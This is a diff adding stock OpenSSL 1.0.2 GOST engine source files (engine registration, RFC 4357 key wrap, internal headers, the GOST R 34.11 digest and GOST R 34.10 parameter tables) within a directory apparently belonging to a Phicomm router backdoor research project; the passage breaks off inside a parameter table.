+    IMPLEMENT_DYNAMIC_CHECK_FN()
+#endif                          /* ndef OPENSSL_NO_DYNAMIC_ENGINE */
+static int gost_digests(ENGINE *e, const EVP_MD **digest,
+                        const int **nids, int nid)
+{
+    int ok = 1;
+    if (!digest) {
+        *nids = gost_digest_nids;
+        return 2;
+    }
+    /*
+     * printf("Digest no %d requested\n",nid);
+     */
+    if (nid == NID_id_GostR3411_94) {
+        *digest = &digest_gost;
+    } else if (nid == NID_id_Gost28147_89_MAC) {
+        *digest = &imit_gost_cpa;
+    } else {
+        ok = 0;
+        *digest = NULL;
+    }
+    return ok;
+}
+
+static int gost_ciphers(ENGINE *e, const EVP_CIPHER **cipher,
+                        const int **nids, int nid)
+{
+    int ok = 1;
+    if (!cipher) {
+        *nids = gost_cipher_nids;
+        return 2;               /* two ciphers are supported */
+    }
+
+    if (nid == NID_id_Gost28147_89) {
+        *cipher = &cipher_gost;
+    } else if (nid == NID_gost89_cnt) {
+        *cipher = &cipher_gost_cpacnt;
+    } else {
+        ok = 0;
+        *cipher = NULL;
+    }
+    return ok;
+}
+
+static int gost_pkey_meths(ENGINE *e, EVP_PKEY_METHOD **pmeth,
+                           const int **nids, int nid)
+{
+    if (!pmeth) {
+        *nids = gost_pkey_meth_nids;
+        return 3;
+    }
+
+    switch (nid) {
+    case NID_id_GostR3410_94:
+        *pmeth = pmeth_GostR3410_94;
+        return 1;
+    case NID_id_GostR3410_2001:
+        *pmeth = pmeth_GostR3410_2001;
+        return 1;
+    case NID_id_Gost28147_89_MAC:
+        *pmeth = pmeth_Gost28147_MAC;
+        return 1;
+    default:;
+    }
+
+    *pmeth = NULL;
+    return 0;
+}
+
+static int gost_pkey_asn1_meths(ENGINE *e, EVP_PKEY_ASN1_METHOD **ameth,
+                                const int **nids, int nid)
+{
+    if (!ameth) {
+        *nids = gost_pkey_meth_nids;
+        return 3;
+    }
+    switch (nid) {
+    case NID_id_GostR3410_94:
+        *ameth = ameth_GostR3410_94;
+        return 1;
+    case NID_id_GostR3410_2001:
+        *ameth = ameth_GostR3410_2001;
+        return 1;
+    case NID_id_Gost28147_89_MAC:
+        *ameth = ameth_Gost28147_MAC;
+        return 1;
+
+    default:;
+    }
+
+    *ameth = NULL;
+    return 0;
+}
+
+#ifdef OPENSSL_NO_DYNAMIC_ENGINE
+static ENGINE *engine_gost(void)
+{
+    ENGINE *ret = ENGINE_new();
+    if (!ret)
+        return NULL;
+    if (!bind_gost(ret, engine_gost_id)) {
+        ENGINE_free(ret);
+        return NULL;
+    }
+    return ret;
+}
+
+void ENGINE_load_gost(void)
+{
+    ENGINE *toadd;
+    if (pmeth_GostR3410_94)
+        return;
+    toadd = engine_gost();
+    if (!toadd)
+        return;
+    ENGINE_add(toadd);
+    ENGINE_free(toadd);
+    ERR_clear_error();
+}
+#endif
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/engines/ccgost/gost_keywrap.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/engines/ccgost/gost_keywrap.c
new file mode 100644
index 0000000..502a83c
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/engines/ccgost/gost_keywrap.c
@@ -0,0 +1,106 @@
+/**********************************************************************
+ *                          keywrap.c                                 *
+ *             Copyright (c) 2005-2006 Cryptocom LTD                  *
+ *         This file is distributed under the same license as OpenSSL *
+ *                                                                    *
+ * Implementation of CryptoPro key wrap algorithm, as defined in      *
+ *               RFC 4357 p 6.3 and 6.4                               *
+ *                  Doesn't need OpenSSL                              *
+ **********************************************************************/
+#include <string.h>
+#include "gost89.h"
+#include "gost_keywrap.h"
+
+/*-
+ * Diversifies key using random UserKey Material
+ * Implements RFC 4357 p 6.5 key diversification algorithm
+ *
+ * inputKey - 32byte key to be diversified
+ * ukm - 8byte user key material
+ * outputKey - 32byte buffer to store diversified key
+ *
+ */
+void keyDiversifyCryptoPro(gost_ctx * ctx, const unsigned char *inputKey,
+                           const unsigned char *ukm, unsigned char *outputKey)
+{
+
+    u4 k, s1, s2;
+    int i, j, mask;
+    unsigned char S[8];
+    memcpy(outputKey, inputKey, 32);
+    for (i = 0; i < 8; i++) {
+        /* Make array of integers from key */
+        /* Compute IV S */
+        s1 = 0, s2 = 0;
+        for (j = 0, mask = 1; j < 8; j++, mask <<= 1) {
+            k = ((u4) outputKey[4 * j]) | (outputKey[4 * j + 1] << 8) |
+                (outputKey[4 * j + 2] << 16) | (outputKey[4 * j + 3] << 24);
+            if (mask & ukm[i]) {
+                s1 += k;
+            } else {
+                s2 += k;
+            }
+        }
+        S[0] = (unsigned char)(s1 & 0xff);
+        S[1] = (unsigned char)((s1 >> 8) & 0xff);
+        S[2] = (unsigned char)((s1 >> 16) & 0xff);
+        S[3] = (unsigned char)((s1 >> 24) & 0xff);
+        S[4] = (unsigned char)(s2 & 0xff);
+        S[5] = (unsigned char)((s2 >> 8) & 0xff);
+        S[6] = (unsigned char)((s2 >> 16) & 0xff);
+        S[7] = (unsigned char)((s2 >> 24) & 0xff);
+        gost_key(ctx, outputKey);
+        gost_enc_cfb(ctx, S, outputKey, outputKey, 4);
+    }
+}
+
+/*-
+ * Wraps key using RFC 4357 6.3
+ * ctx - gost encryption context, initialized with some S-boxes
+ * keyExchangeKey (KEK) 32-byte (256-bit) shared key
+ * ukm - 8 byte (64 bit) user key material,
+ * sessionKey - 32-byte (256-bit) key to be wrapped
+ * wrappedKey - 44-byte buffer to store wrapped key
+ */
+
+int keyWrapCryptoPro(gost_ctx * ctx, const unsigned char *keyExchangeKey,
+                     const unsigned char *ukm,
+                     const unsigned char *sessionKey,
+                     unsigned char *wrappedKey)
+{
+    unsigned char kek_ukm[32];
+    keyDiversifyCryptoPro(ctx, keyExchangeKey, ukm, kek_ukm);
+    gost_key(ctx, kek_ukm);
+    memcpy(wrappedKey, ukm, 8);
+    gost_enc(ctx, sessionKey, wrappedKey + 8, 4);
+    gost_mac_iv(ctx, 32, ukm, sessionKey, 32, wrappedKey + 40);
+    return 1;
+}
+
+/*-
+ * Unwraps key using RFC 4357 6.4
+ * ctx - gost encryption context, initialized with some S-boxes
+ * keyExchangeKey 32-byte shared key
+ * wrappedKey  44 byte key to be unwrapped (concatenation of 8-byte UKM,
+ * 32 byte  encrypted key and 4 byte MAC
+ *
+ * sessionKEy - 32byte buffer to store sessionKey in
+ * Returns 1 if key is decrypted successfully, and 0 if MAC doesn't match
+ */
+
+int keyUnwrapCryptoPro(gost_ctx * ctx, const unsigned char *keyExchangeKey,
+                       const unsigned char *wrappedKey,
+                       unsigned char *sessionKey)
+{
+    unsigned char kek_ukm[32], cek_mac[4];
+    keyDiversifyCryptoPro(ctx, keyExchangeKey, wrappedKey
+                          /* First 8 bytes of wrapped Key is ukm */
+                          , kek_ukm);
+    gost_key(ctx, kek_ukm);
+    gost_dec(ctx, wrappedKey + 8, sessionKey, 4);
+    gost_mac_iv(ctx, 32, wrappedKey, sessionKey, 32, cek_mac);
+    if (memcmp(cek_mac, wrappedKey + 40, 4)) {
+        return 0;
+    }
+    return 1;
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/engines/ccgost/gost_keywrap.h b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/engines/ccgost/gost_keywrap.h
new file mode 100644
index 0000000..7def4c9
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/engines/ccgost/gost_keywrap.h
@@ -0,0 +1,56 @@
+/**********************************************************************
+ *                         gost_keywrap.h                             *
+ *             Copyright (c) 2005-2006 Cryptocom LTD                  *
+ *       This file is distributed under the same license as OpenSSL   *
+ *                                                                    *
+ * Implementation of CryptoPro key wrap algorithm, as defined in      *
+ * RFC 4357 p 6.3 and 6.4                                             *
+ * Doesn't need OpenSSL                                               *
+ **********************************************************************/
+#ifndef GOST_KEYWRAP_H
+# define GOST_KEYWRAP_H
+# include <string.h>
+# include "gost89.h"
+/*-
+ * Diversifies key using random UserKey Material
+ * Implements RFC 4357 p 6.5 key diversification algorithm
+ *
+ * inputKey - 32byte key to be diversified
+ * ukm - 8byte user key material
+ * outputKey - 32byte buffer to store diversified key
+ *
+ */
+void keyDiversifyCryptoPro(gost_ctx * ctx,
+                           const unsigned char *inputKey,
+                           const unsigned char *ukm,
+                           unsigned char *outputKey);
+/*-
+ * Wraps key using RFC 4357 6.3
+ * ctx - gost encryption context, initialized with some S-boxes
+ * keyExchangeKey (KEK) 32-byte (256-bit) shared key
+ * ukm - 8 byte (64 bit) user key material,
+ * sessionKey - 32-byte (256-bit) key to be wrapped
+ * wrappedKey - 44-byte buffer to store wrapped key
+ */
+
+int keyWrapCryptoPro(gost_ctx * ctx,
+                     const unsigned char *keyExchangeKey,
+                     const unsigned char *ukm,
+                     const unsigned char *sessionKey,
+                     unsigned char *wrappedKey);
+/*-
+ * Unwraps key using RFC 4357 6.4
+ * ctx - gost encryption context, initialized with some S-boxes
+ * keyExchangeKey 32-byte shared key
+ * wrappedKey  44 byte key to be unwrapped (concatenation of 8-byte UKM,
+ * 32 byte  encrypted key and 4 byte MAC
+ *
+ * sessionKEy - 32byte buffer to store sessionKey in
+ * Returns 1 if key is decrypted successfully, and 0 if MAC doesn't match
+ */
+
+int keyUnwrapCryptoPro(gost_ctx * ctx,
+                       const unsigned char *keyExchangeKey,
+                       const unsigned char *wrappedKey,
+                       unsigned char *sessionKey);
+#endif
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/engines/ccgost/gost_lcl.h b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/engines/ccgost/gost_lcl.h
new file mode 100644
index 0000000..3a2c7d5
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/engines/ccgost/gost_lcl.h
@@ -0,0 +1,229 @@
+#ifndef GOST_TOOLS_H
+# define GOST_TOOLS_H
+/**********************************************************************
+ *                        gost_lcl.h                                  *
+ *             Copyright (c) 2006 Cryptocom LTD                       *
+ *       This file is distributed under the same license as OpenSSL   *
+ *                                                                    *
+ *         Internal declarations  used in GOST engine                *
+ *         OpenSSL 0.9.9 libraries required to compile and use        *
+ *                              this code                             *
+ **********************************************************************/
+# include <openssl/bn.h>
+# include <openssl/evp.h>
+# include <openssl/dsa.h>
+# include <openssl/asn1t.h>
+# include <openssl/x509.h>
+# include <openssl/engine.h>
+# include <openssl/ec.h>
+# include "gost89.h"
+# include "gosthash.h"
+/* Control commands */
+# define GOST_PARAM_CRYPT_PARAMS 0
+# define GOST_PARAM_MAX 0
+# define GOST_CTRL_CRYPT_PARAMS (ENGINE_CMD_BASE+GOST_PARAM_CRYPT_PARAMS)
+
+extern const ENGINE_CMD_DEFN gost_cmds[];
+int gost_control_func(ENGINE *e, int cmd, long i, void *p, void (*f) (void));
+const char *get_gost_engine_param(int param);
+int gost_set_default_param(int param, const char *value);
+void gost_param_free(void);
+
+/* method registration */
+
+int register_ameth_gost(int nid, EVP_PKEY_ASN1_METHOD **ameth,
+                        const char *pemstr, const char *info);
+int register_pmeth_gost(int id, EVP_PKEY_METHOD **pmeth, int flags);
+
+/* Gost-specific pmeth control-function parameters */
+/* For GOST R34.10 parameters */
+# define param_ctrl_string "paramset"
+# define EVP_PKEY_CTRL_GOST_PARAMSET (EVP_PKEY_ALG_CTRL+1)
+/* For GOST 28147 MAC */
+# define key_ctrl_string "key"
+# define hexkey_ctrl_string "hexkey"
+# define EVP_PKEY_CTRL_GOST_MAC_HEXKEY (EVP_PKEY_ALG_CTRL+3)
+/* Pmeth internal representation */
+struct gost_pmeth_data {
+    int sign_param_nid;         /* Should be set whenever parameters are
+                                 * filled */
+    EVP_MD *md;
+    unsigned char *shared_ukm;
+    int peer_key_used;
+};
+
+struct gost_mac_pmeth_data {
+    int key_set;
+    EVP_MD *md;
+    unsigned char key[32];
+};
+/* GOST-specific ASN1 structures */
+
+typedef struct {
+    ASN1_OCTET_STRING *encrypted_key;
+    ASN1_OCTET_STRING *imit;
+} GOST_KEY_INFO;
+
+DECLARE_ASN1_FUNCTIONS(GOST_KEY_INFO)
+
+typedef struct {
+    ASN1_OBJECT *cipher;
+    X509_PUBKEY *ephem_key;
+    ASN1_OCTET_STRING *eph_iv;
+} GOST_KEY_AGREEMENT_INFO;
+
+DECLARE_ASN1_FUNCTIONS(GOST_KEY_AGREEMENT_INFO)
+
+typedef struct {
+    GOST_KEY_INFO *key_info;
+    GOST_KEY_AGREEMENT_INFO *key_agreement_info;
+} GOST_KEY_TRANSPORT;
+
+DECLARE_ASN1_FUNCTIONS(GOST_KEY_TRANSPORT)
+
+typedef struct {                /* FIXME incomplete */
+    GOST_KEY_TRANSPORT *gkt;
+} GOST_CLIENT_KEY_EXCHANGE_PARAMS;
+
+/*
+ * Hacks to shorten symbols to 31 characters or less, or OpenVMS. This mimics
+ * what's done in symhacks.h, but since this is a very local header file, I
+ * prefered to put this hack directly here. -- Richard Levitte
+ */
+# ifdef OPENSSL_SYS_VMS
+#  undef GOST_CLIENT_KEY_EXCHANGE_PARAMS_it
+#  define GOST_CLIENT_KEY_EXCHANGE_PARAMS_it      GOST_CLIENT_KEY_EXC_PARAMS_it
+#  undef GOST_CLIENT_KEY_EXCHANGE_PARAMS_new
+#  define GOST_CLIENT_KEY_EXCHANGE_PARAMS_new     GOST_CLIENT_KEY_EXC_PARAMS_new
+#  undef GOST_CLIENT_KEY_EXCHANGE_PARAMS_free
+#  define GOST_CLIENT_KEY_EXCHANGE_PARAMS_free    GOST_CLIENT_KEY_EXC_PARAMS_free
+#  undef d2i_GOST_CLIENT_KEY_EXCHANGE_PARAMS
+#  define d2i_GOST_CLIENT_KEY_EXCHANGE_PARAMS     d2i_GOST_CLIENT_KEY_EXC_PARAMS
+#  undef i2d_GOST_CLIENT_KEY_EXCHANGE_PARAMS
+#  define i2d_GOST_CLIENT_KEY_EXCHANGE_PARAMS     i2d_GOST_CLIENT_KEY_EXC_PARAMS
+# endif                         /* End of hack */
+DECLARE_ASN1_FUNCTIONS(GOST_CLIENT_KEY_EXCHANGE_PARAMS)
+typedef struct {
+    ASN1_OBJECT *key_params;
+    ASN1_OBJECT *hash_params;
+    ASN1_OBJECT *cipher_params;
+} GOST_KEY_PARAMS;
+
+DECLARE_ASN1_FUNCTIONS(GOST_KEY_PARAMS)
+
+typedef struct {
+    ASN1_OCTET_STRING *iv;
+    ASN1_OBJECT *enc_param_set;
+} GOST_CIPHER_PARAMS;
+
+DECLARE_ASN1_FUNCTIONS(GOST_CIPHER_PARAMS)
+/*============== Message digest  and cipher related structures  ==========*/
+         /*
+          * Structure used as EVP_MD_CTX-md_data. It allows to avoid storing
+          * in the md-data pointers to dynamically allocated memory. I
+          * cannot invent better way to avoid memory leaks, because openssl
+          * insist on invoking Init on Final-ed digests, and there is no
+          * reliable way to find out whether pointer in the passed md_data is
+          * valid or not.
+          */
+struct ossl_gost_digest_ctx {
+    gost_hash_ctx dctx;
+    gost_ctx cctx;
+};
+/* EVP_MD structure for GOST R 34.11 */
+extern EVP_MD digest_gost;
+/* EVP_MD structure for GOST 28147 in MAC mode */
+extern EVP_MD imit_gost_cpa;
+/* Cipher context used for EVP_CIPHER operation */
+struct ossl_gost_cipher_ctx {
+    int paramNID;
+    unsigned int count;
+    int key_meshing;
+    gost_ctx cctx;
+};
+/* Structure to map parameter NID to S-block */
+struct gost_cipher_info {
+    int nid;
+    gost_subst_block *sblock;
+    int key_meshing;
+};
+/* Context for MAC */
+struct ossl_gost_imit_ctx {
+    gost_ctx cctx;
+    unsigned char buffer[8];
+    unsigned char partial_block[8];
+    unsigned int count;
+    int key_meshing;
+    int bytes_left;
+    int key_set;
+};
+/* Table which maps parameter NID to S-blocks */
+extern struct gost_cipher_info gost_cipher_list[];
+/* Find encryption params from ASN1_OBJECT */
+const struct gost_cipher_info *get_encryption_params(ASN1_OBJECT *obj);
+/* Implementation of GOST 28147-89 cipher in CFB and CNT modes */
+extern EVP_CIPHER cipher_gost;
+extern EVP_CIPHER cipher_gost_cpacnt;
+# define EVP_MD_CTRL_KEY_LEN (EVP_MD_CTRL_ALG_CTRL+3)
+# define EVP_MD_CTRL_SET_KEY (EVP_MD_CTRL_ALG_CTRL+4)
+/* EVP_PKEY_METHOD key encryption callbacks */
+/* From gost94_keyx.c */
+int pkey_GOST94cp_encrypt(EVP_PKEY_CTX *ctx, unsigned char *out,
+                          size_t *outlen, const unsigned char *key,
+                          size_t key_len);
+
+int pkey_GOST94cp_decrypt(EVP_PKEY_CTX *ctx, unsigned char *out,
+                          size_t *outlen, const unsigned char *in,
+                          size_t in_len);
+/* From gost2001_keyx.c */
+int pkey_GOST01cp_encrypt(EVP_PKEY_CTX *ctx, unsigned char *out,
+                          size_t *outlen, const unsigned char *key,
+                          size_t key_len);
+
+int pkey_GOST01cp_decrypt(EVP_PKEY_CTX *ctx, unsigned char *out,
+                          size_t *outlen, const unsigned char *in,
+                          size_t in_len);
+/* derive functions */
+/* From gost2001_keyx.c */
+int pkey_gost2001_derive(EVP_PKEY_CTX *ctx, unsigned char *key,
+                         size_t *keylen);
+/* From gost94_keyx.c */
+int pkey_gost94_derive(EVP_PKEY_CTX *ctx, unsigned char *key, size_t *keylen);
+/* Internal functions for signature algorithms */
+int fill_GOST94_params(DSA *dsa, int nid);
+int fill_GOST2001_params(EC_KEY *eckey, int nid);
+int gost_sign_keygen(DSA *dsa);
+int gost2001_keygen(EC_KEY *ec);
+
+DSA_SIG *gost_do_sign(const unsigned char *dgst, int dlen, DSA *dsa);
+DSA_SIG *gost2001_do_sign(const unsigned char *dgst, int dlen, EC_KEY *eckey);
+
+int gost_do_verify(const unsigned char *dgst, int dgst_len,
+                   DSA_SIG *sig, DSA *dsa);
+int gost2001_do_verify(const unsigned char *dgst, int dgst_len,
+                       DSA_SIG *sig, EC_KEY *ec);
+int gost2001_compute_public(EC_KEY *ec);
+int gost94_compute_public(DSA *dsa);
+/*============== miscellaneous functions============================= */
+/* from gost_sign.c */
+/* Convert GOST R 34.11 hash sum to bignum according to standard */
+BIGNUM *hashsum2bn(const unsigned char *dgst);
+/*
+ * Store bignum in byte array of given length, prepending by zeros if
+ * nesseccary
+ */
+int store_bignum(BIGNUM *bn, unsigned char *buf, int len);
+/* Read bignum, which can have few MSB all-zeros    from buffer*/
+BIGNUM *getbnfrombuf(const unsigned char *buf, size_t len);
+/* Pack GOST R 34.10 signature according to CryptoPro rules */
+int pack_sign_cp(DSA_SIG *s, int order, unsigned char *sig, size_t *siglen);
+/* Unpack GOST R 34.10 signature according to CryptoPro rules */
+DSA_SIG *unpack_cp_signature(const unsigned char *sig, size_t siglen);
+/* from ameth.c */
+/* Get private key as BIGNUM from both R 34.10-94 and R 34.10-2001  keys*/
+/* Returns pointer into EVP_PKEY structure */
+BIGNUM *gost_get0_priv_key(const EVP_PKEY *pkey);
+/* Find NID by GOST 94 parameters */
+int gost94_nid_by_params(DSA *p);
+
+#endif
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/engines/ccgost/gost_md.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/engines/ccgost/gost_md.c
new file mode 100644
index 0000000..1ccc6be
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/engines/ccgost/gost_md.c
@@ -0,0 +1,76 @@
+/**********************************************************************
+ *                          md_gost.c                                 *
+ *             Copyright (c) 2005-2006 Cryptocom LTD                  *
+ *         This file is distributed under the same license as OpenSSL *
+ *                                                                    *
+ *       OpenSSL interface to GOST R 34.11-94 hash functions          *
+ *          Requires OpenSSL 0.9.9 for compilation                    *
+ **********************************************************************/
+#include <string.h>
+#include "gost_lcl.h"
+#include "gosthash.h"
+#include "e_gost_err.h"
+
+/* implementation of GOST 34.11 hash function See gost_md.c*/
+static int gost_digest_init(EVP_MD_CTX *ctx);
+static int gost_digest_update(EVP_MD_CTX *ctx, const void *data,
+                              size_t count);
+static int gost_digest_final(EVP_MD_CTX *ctx, unsigned char *md);
+static int gost_digest_copy(EVP_MD_CTX *to, const EVP_MD_CTX *from);
+static int gost_digest_cleanup(EVP_MD_CTX *ctx);
+
+EVP_MD digest_gost = {
+    NID_id_GostR3411_94,
+    NID_undef,
+    32,
+    EVP_MD_FLAG_PKEY_METHOD_SIGNATURE,
+    gost_digest_init,
+    gost_digest_update,
+    gost_digest_final,
+    gost_digest_copy,
+    gost_digest_cleanup,
+    NULL,
+    NULL,
+    {NID_undef, NID_undef, 0, 0, 0},
+    32,
+    sizeof(struct ossl_gost_digest_ctx),
+    NULL
+};
+
+int gost_digest_init(EVP_MD_CTX *ctx)
+{
+    struct ossl_gost_digest_ctx *c = ctx->md_data;
+    memset(&(c->dctx), 0, sizeof(gost_hash_ctx));
+    gost_init(&(c->cctx), &GostR3411_94_CryptoProParamSet);
+    c->dctx.cipher_ctx = &(c->cctx);
+    return 1;
+}
+
+int gost_digest_update(EVP_MD_CTX *ctx, const void *data, size_t count)
+{
+    return hash_block((gost_hash_ctx *) ctx->md_data, data, count);
+}
+
+int gost_digest_final(EVP_MD_CTX *ctx, unsigned char *md)
+{
+    return finish_hash((gost_hash_ctx *) ctx->md_data, md);
+
+}
+
+int gost_digest_copy(EVP_MD_CTX *to, const EVP_MD_CTX *from)
+{
+    struct ossl_gost_digest_ctx *md_ctx = to->md_data;
+    if (to->md_data && from->md_data) {
+        memcpy(to->md_data, from->md_data,
+               sizeof(struct ossl_gost_digest_ctx));
+        md_ctx->dctx.cipher_ctx = &(md_ctx->cctx);
+    }
+    return 1;
+}
+
+int gost_digest_cleanup(EVP_MD_CTX *ctx)
+{
+    if (ctx->md_data)
+        memset(ctx->md_data, 0, sizeof(struct ossl_gost_digest_ctx));
+    return 1;
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/engines/ccgost/gost_params.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/engines/ccgost/gost_params.c
new file mode 100644
index 0000000..0411534
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/engines/ccgost/gost_params.c
@@ -0,0 +1,207 @@
+/**********************************************************************
+ *                        params.c                                    *
+ *             Copyright (c) 2005-2006 Cryptocom LTD                  *
+ *         This file is distributed under the same license as OpenSSL *
+ *                                                                    *
+ * Definitions of GOST R 34.10 parameter sets, defined in RFC 4357    *
+ *         OpenSSL 0.9.9 libraries required to compile and use        *
+ *                              this code                             *
+ **********************************************************************/
+#include "gost_params.h"
+#include <openssl/objects.h>
+/* Parameters of GOST 34.10 */
+
+R3410_params R3410_paramset[] = {
+/* Paramset A */
+    {NID_id_GostR3410_94_CryptoPro_A_ParamSet,
+     "100997906755055304772081815535925224869"
+     "8410825720534578748235158755771479905292727772441528526992987964833"
+     "5669968284202797289605274717317548059048560713474685214192868091256"
+     "1502802222185647539190902656116367847270145019066794290930185446216"
+     "3997308722217328898303231940973554032134009725883228768509467406639"
+     "62",
+     "127021248288932417465907042777176443525"
+     "7876535089165358128175072657050312609850984974231883334834011809259"
+     "9999512098893413065920561499672425412104927434935707492031276956145"
+     "1689224110579311248812610229678534638401693520013288995000362260684"
+     "2227508135323070045173416336850045410625869714168836867788425378203"
+     "83",
+     "683631961449557007844441656118272528951"
+     "02170888761442055095051287550314083023"}
+    ,
+    {NID_id_GostR3410_94_CryptoPro_B_ParamSet,
+     "429418261486158041438734477379555023926"
+     "7234596860714306679811299408947123142002706038521669956384871995765"
+     "7284814898909770759462613437669456364882730370838934791080835932647"
+     "9767786019153434744009610342313166725786869204821949328786333602033"
+     "8479709268434224762105576023501613261478065276102850944540333865234"
+     "1",
+     "139454871199115825601409655107690713107"
+     "0417070599280317977580014543757653577229840941243685222882398330391"
+     "1468164807668823692122073732267216074074777170091113455043205380464"
+     "7694904686120113087816240740184800477047157336662926249423571248823"
+     "9685422217536601433914856808405203368594584948031873412885804895251"
+     "63",
+     "79885141663410976897627118935756323747307951916507639758300472692338873533959"}
+    ,
+    {NID_id_GostR3410_94_CryptoPro_C_ParamSet,
+     "816552717970881016017893191415300348226"
+     "2544051353358162468249467681876621283478212884286545844013955142622"
+     "2087723485023722868022275009502224827866201744494021697716482008353"
+     "6398202298024892620480898699335508064332313529725332208819456895108"
+     "5155178100221003459370588291073071186553005962149936840737128710832"
+     "3",
+     "110624679233511963040518952417017040248"
+     "5862954819831383774196396298584395948970608956170224210628525560327"
+     "8638246716655439297654402921844747893079518669992827880792192992701"
+     "1428546551433875806377110443534293554066712653034996277099320715774"
+     "3542287621283671843703709141350171945045805050291770503634517804938"
+     "01",
+     "113468861199819350564868233378875198043"
+     "267947776488510997961231672532899549103"}
+    ,
+    {NID_id_GostR3410_94_CryptoPro_D_ParamSet,
+     "756976611021707301782128757801610628085"
+     "5283803109571158829574281419208532589041660017017859858216341400371"
+     "4687551412794400562878935266630754392677014598582103365983119173924"
+     "4732511225464712252386803315902707727668715343476086350472025298282"
+     "7271461690125050616858238384366331089777463541013033926723743254833"
+     "7",
+     "905457649621929965904290958774625315611"
+     "3056083907389766971404812524422262512556054474620855996091570786713"
+     "5849550236741915584185990627801066465809510095784713989819413820871"
+     "5964648914493053407920737078890520482730623038837767710173664838239"
+     "8574828787891286471201460474326612697849693665518073864436497893214"
+     "9",
+     "108988435796353506912374591498972192620"
+     "190487557619582334771735390599299211593"}
+    ,
+
+    {NID_id_GostR3410_94_CryptoPro_XchA_ParamSet,
+     "1335318132727206734338595199483190012179423759678474868994823595993"
+     "6964252873471246159040332773182141032801252925387191478859899310331"
+     "0567744136196364803064721377826656898686468463277710150809401182608"
+     "7702016153249904683329312949209127762411378780302243557466062839716"
+     "59376426832674269780880061631528163475887",
+     "14201174159756348119636828602231808974327613839524373876287257344192"
+     "74593935127189736311660784676003608489466235676257952827747192122419"
+     "29071046134208380636394084512691828894000571524625445295769349356752"
+     "72895683154177544176313938445719175509684710784659566254794231229333"
+     "8483924514339614727760681880609734239",
+     "91771529896554605945588149018382750217296858393520724172743325725474"
+     "374979801"}
+    ,
+    {NID_id_GostR3410_94_CryptoPro_XchB_ParamSet,
+     "8890864727828423151699995801875757891031463338652579140051973659"
+     "3048131440685857067369829407947744496306656291505503608252399443"
+     "7900272386749145996230867832228661977543992816745254823298629859"
+     "8753575466286051738837854736167685769017780335804511440773337196"
+     "2538423532919394477873664752824509986617878992443177",
+     "1028946126624994859676552074360530315217970499989304888248413244"
+     "8474923022758470167998871003604670704877377286176171227694098633"
+     "1539089568784129110109512690503345393869871295783467257264868341"
+     "7200196629860561193666752429682367397084815179752036423595736533"
+     "68957392061769855284593965042530895046088067160269433",
+     "9109671391802626916582318050603555673628769498182593088388796888"
+     "5281641595199"}
+    ,
+    {NID_id_GostR3410_94_CryptoPro_XchC_ParamSet,
+     "4430618464297584182473135030809859326863990650118941756995270074"
+     "8609973181426950235239623239110557450826919295792878938752101867"
+     "7047181623251027516953100431855964837602657827828194249605561893"
+     "6965865325513137194483136247773653468410118796740709840825496997"
+     "9375560722345106704721086025979309968763193072908334",
+     "1246996366993477513607147265794064436203408861395055989217248455"
+     "7299870737698999651480662364723992859320868822848751165438350943"
+     "3276647222625940615560580450040947211826027729977563540237169063"
+     "0448079715771649447778447000597419032457722226253269698374446528"
+     "35352729304393746106576383349151001715930924115499549",
+     "6787876137336591234380295020065682527118129468050147943114675429"
+     "4748422492761"}
+    ,
+
+    {NID_undef, NULL, NULL, NULL}
+};
+
+R3410_2001_params R3410_2001_paramset[] = {
+    /* default_cc_sign01_param 1.2.643.2.9.1.8.1 */
+    {NID_id_GostR3410_2001_ParamSet_cc,
+     /* A */
+     "C0000000000000000000000000000000000000000000000000000000000003c4",
+     /* B */
+     "2d06B4265ebc749ff7d0f1f1f88232e81632e9088fd44b7787d5e407e955080c",
+     /* P */
+     "C0000000000000000000000000000000000000000000000000000000000003C7",
+     /* Q */
+     "5fffffffffffffffffffffffffffffff606117a2f4bde428b7458a54b6e87b85",
+     /* X */
+     "2",
+     /* Y */
+     "a20e034bf8813ef5c18d01105e726a17eb248b264ae9706f440bedc8ccb6b22c"}
+    ,
+    /* 1.2.643.2.2.35.0 */
+    {NID_id_GostR3410_2001_TestParamSet,
+     "7",
+     "5FBFF498AA938CE739B8E022FBAFEF40563F6E6A3472FC2A514C0CE9DAE23B7E",
+     "8000000000000000000000000000000000000000000000000000000000000431",
+     "8000000000000000000000000000000150FE8A1892976154C59CFC193ACCF5B3",
+     "2",
+     "08E2A8A0E65147D4BD6316030E16D19C85C97F0A9CA267122B96ABBCEA7E8FC8"}
+    ,
+    /*
+     * 1.2.643.2.2.35.1
+     */
+    {NID_id_GostR3410_2001_CryptoPro_A_ParamSet,
+     "FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFD94",
+     "a6",
+     "FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFD97",
+     "FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF6C611070995AD10045841B09B761B893",
+     "1",
+     "8D91E471E0989CDA27DF505A453F2B7635294F2DDF23E3B122ACC99C9E9F1E14"}
+    ,
+    /*
+     * 1.2.643.2.2.35.2
+     */
+    {NID_id_GostR3410_2001_CryptoPro_B_ParamSet,
+     "8000000000000000000000000000000000000000000000000000000000000C96",
+     "3E1AF419A269A5F866A7D3C25C3DF80AE979259373FF2B182F49D4CE7E1BBC8B",
+     "8000000000000000000000000000000000000000000000000000000000000C99",
+     "800000000000000000000000000000015F700CFFF1A624E5E497161BCC8A198F",
+     "1",
